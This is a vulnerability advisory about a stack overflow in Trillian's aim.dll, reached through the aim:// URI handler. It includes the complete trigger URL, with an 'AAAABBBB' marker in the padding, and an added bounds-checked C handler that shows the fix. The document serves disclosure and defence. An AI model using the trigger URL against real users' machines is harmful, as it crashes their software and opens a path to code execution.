Stack Overflow in Trillian’s aim.dll through the aim:// URI
Trillian is a chat client that lets users talk across multiple protocols, such as AIM, IRC, ICQ, Yahoo!, and MSN.
When Trillian is installed, the aim:// URI is registered in the Windows Registry and associated with the command
'Rundll32.exe "C:/Program Files/Trillian/plugins/aim.dll", aim_util_urlHandler url="%1" ini="c:/program files/trillian/users/default/cache/pending_aim.ini"'.
As you can see, calling the aim:// protocol spawns a Rundll32.exe process that loads aim.dll with the specified options. The value placed in the aim_util_urlHandler url argument is controlled by the user through the URI, for example aim://MyURL. This value is later copied without bounds checking, and an attacker can use this to cause a stack overflow exception. Accessing the following URL from IE6, IE7, or Firefox will trigger a stack overflow:
aim:///#1111111/1111111111111111111111111111111111111111111111111111111111111
2222222222222222222222222222222222222222222222222222222222222
3333333333333333333333333333333333333333333333333333333333333
4444444444444444444444444444444444444444444444444444444444444
5555555555555555555555555555555555555555555555555555555555555
6666666AAAABBBB6666666666666666666666666666666666666666666666
6666666666666667777777777777777777777777777777777777777777777777777777777777
8888888888888888888888888888888888888888888888888888888888888
9999999999999999999999999999999999999999999999999999999999999
0000000000000000000000000000000000000000000000000000000000000
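The defect class described above, shown from the fixing side as an added example (this is not Trillian's aim.dll code): a handler that pulls the url= value out of the rundll32 command line and copies it into its fixed buffer only when it fits, rejecting over-long input instead of overrunning the stack. The buffer size, function names and the constructed inputs are assumptions.

```c
#include <stdbool.h>
#include <string.h>

/* Added example, not Trillian's aim.dll. The unsafe pattern is a fixed stack
 * buffer filled by an unbounded copy of the "url=..." value (e.g. strcpy);
 * the handler below adds the bounds check that pattern lacks. */
#define URL_BUF 256   /* assumed destination size */

/* Extracts the value after "url=" and copies it into out only if it fits.
 * Over-long or non-aim:// values are rejected rather than truncated. */
bool aim_handle_url(const char *cmdline, char *out, size_t outsz) {
    const char *p = strstr(cmdline, "url=");
    if (p == NULL) return false;
    p += 4;
    if (*p == '"') p++;                      /* tolerate the quoted "%1" form */
    size_t n = strcspn(p, "\" ");            /* value ends at a quote or space */
    if (n == 0 || n >= outsz) return false;  /* would not fit: reject */
    if (strncmp(p, "aim://", 6) != 0) return false;
    memcpy(out, p, n);
    out[n] = '\0';
    return true;
}

/* A normal invocation, shaped like the registered command line. */
bool demo_accepts_normal(void) {
    char buf[URL_BUF];
    return aim_handle_url("aim_util_urlHandler url=\"aim://MyURL\" ini=\"x.ini\"",
                          buf, sizeof buf)
           && strcmp(buf, "aim://MyURL") == 0;
}

/* Constructed over-long input in the shape of the advisory's trigger:
 * "aim:///#" followed by 600 digits, which a 256-byte buffer cannot hold. */
bool demo_rejects_overlong(void) {
    char cmd[1024];
    char buf[URL_BUF];
    const char *prefix = "url=\"aim:///#";
    size_t pre = strlen(prefix);
    memcpy(cmd, prefix, pre);
    memset(cmd + pre, '1', 600);
    cmd[pre + 600] = '"';
    cmd[pre + 601] = '\0';
    return !aim_handle_url(cmd, buf, sizeof buf);
}
```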